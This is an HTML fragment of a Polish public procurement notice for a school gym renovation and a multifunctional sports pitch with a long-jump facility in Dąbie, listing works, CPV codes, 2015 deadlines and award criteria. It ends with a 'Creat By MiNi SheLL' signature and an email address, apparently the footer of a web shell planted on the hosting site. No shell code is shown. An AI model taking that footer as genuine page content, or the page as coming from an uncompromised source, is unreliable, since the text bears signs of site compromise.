c) dostawę i montaż osprzętu sportowego w postaci: bramek do piłki ręcznej, konstrukcji z tablicami do koszykówki, naciągu ściennego do piłki siatkowej, elektronicznej tablicy wyników, ławek z oparciem (drewniane o dł. 2,0m, rozmiar 6, z oparciem na stelażu metalowym o przekroju okrągłym, malowane proszkowo, siedzisko i oparcie z desek bukowych lub sosnowych-lakierowanych), osłon grzejników oraz materaców do zawieszenia na drabinkach,
d) nową wentylację  nawiewno-wywiewną wraz z zasilaniem i sterowaniem,
e) uszczelnienie dachu po zdemontowanej instalacji  i wentylacyjnej,
f) dostarczyć wykładzinę ochraniającą posadzkę sportową wraz z urządzeniem do czyszczenia posadzki oraz wózka do transportu tej wykładziny,
g) nowe oświetlenie wraz z zasilaniem i sterowaniem,
h) roboty malarskie pomieszczenia sali gimnastycznej,
i) ponowny montaż drabinek gimnastycznych,
j) wykonanie wszelkich robót towarzyszących, wynikających z dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.20-1, 45.43.00.00-0, 45.45.30.00-7, 45.33.12.10-1, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres udzielonej gwarancji na przedmiot umowy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty budowlane z podziałem na dwa zadania o nazwie:
Zadanie Nr II:  Budowa boiska wielofunkcyjnego i skoczni w dal przy Szkole Podstawowej w Dąbiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	W ramach realizacji zadania należy wykonać  w szczególności:
a) roboty rozbiórkowe polegające na usunięciu i utylizacji nawierzchni z asfaltobetonu oraz rozebranie ogrodzenia prefabrykowanego, żelbetowego,
b) wykonanie boiska sportowego wielofunkcyjnego o nawierzchni z krótkiej trawy syntetycznej wraz z podbudową i drenażem,
c) wykonanie trybun o konstrukcji betonowej wraz z montażem siedzisk z polipropylenu,
d) wyposażenie boiska w osprzęt sportowy tj.4 kosze do koszykówki o konstrukcji jednosłupowej, bramki aluminiowe do piłki ręcznej mocowane na stałe(2kpl), tuleje ze słupkami do piłki siatkowej(1kpl) z siatką całoroczną, ławki stalowo-drewniane bez oparcia oraz kosze na śmieci,
e) ogrodzenie boiska ogrodzeniem stalowym, panelowym prostym typu 2D o wys. 2m
z pełnym zabezpieczeniem antykorozyjnym wraz z piłkochwytami z siatki polipropylenowej o wys. 2m na bokach dłuższych i 6m na bokach krótszych (za bramkami) wraz z furtkami i bramami w kolorze żółtym,
f) obramowania nawierzchni z obrzeży betonowych z bezpiecznymi nakładkami, 
g) skocznię w dal wraz z rozbiegiem o nawierzchni z EPDM w kolorowym natrysku       
oraz warstwami SBR i ET na podbudowie z kruszyw łamanych wraz z kompletną belką do skoku w dal i wypełnieniem zeskoku piaskiem, 
h) wymianę odcinka ogrodzenia zewnętrznego na stalowe, panelowe z podwaliną i furtką,
i) naprawę i odnowienie elewacji budynku od strony boiska wielofunkcyjnego metodą
lekką-mokrą
j) plantowanie i humusowanie skarp i nasypów wraz z obsianiem trawą oraz przesadzeniem krzewów,
k) demontaż studni rewizyjnych oraz kanalizacji z rur PVC,
l) montaż nowych studzienek, przewodów odwadniających oraz odwodnienia liniowego prefabrykowanego,
m) zasilanie elektryczne wraz z szafami zasilająco-sterowniczymi TOZB
oraz sterowniczymi ST1, TOZ,
n) instalację oświetleniową zewnętrzną boiska wielofunkcyjnego na słupach wraz  z projektorami metalhalogenowymi oraz instalację oświetleniową na elewacji budynku szkoły,
o) kanalizację dla instalacji monitoringu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.23.21.30-2, 45.31.61.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres udzielonej gwarancji na przedmiot umowy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com